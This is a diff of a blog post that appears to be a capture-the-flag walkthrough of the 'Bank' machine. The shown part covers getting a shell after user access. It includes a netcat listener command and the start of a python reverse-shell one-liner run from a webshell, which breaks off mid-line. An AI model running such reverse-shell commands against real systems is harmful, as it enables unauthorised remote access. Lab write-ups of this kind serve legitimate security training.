MrSaighnal/mrsaighnal.github.io/_posts/2019-04-26-bank-walkthrough.md

 {: .box-success}
 **Success:** User Owned.

-it's now time to spawn real shell for managing our new system :-)
+It's now time to spawn real shell for managing our new system :-)

-let's get ready our computer for receving connections through **nc** using the command
+Let's prepare our computer for receiving connection from our reverse shell through **nc**, using the command:

 ~~~
 root@kali:~# nc -vv -n -l -p 1337
 ~~~
 Our machine is now listening on the 1337 port.
 (Don't close this terminal!!!)

-let's launch on the webshell this command
+Let's launch this command on the webshell

 ~~~
 python -c 'import socket,subprocess,os;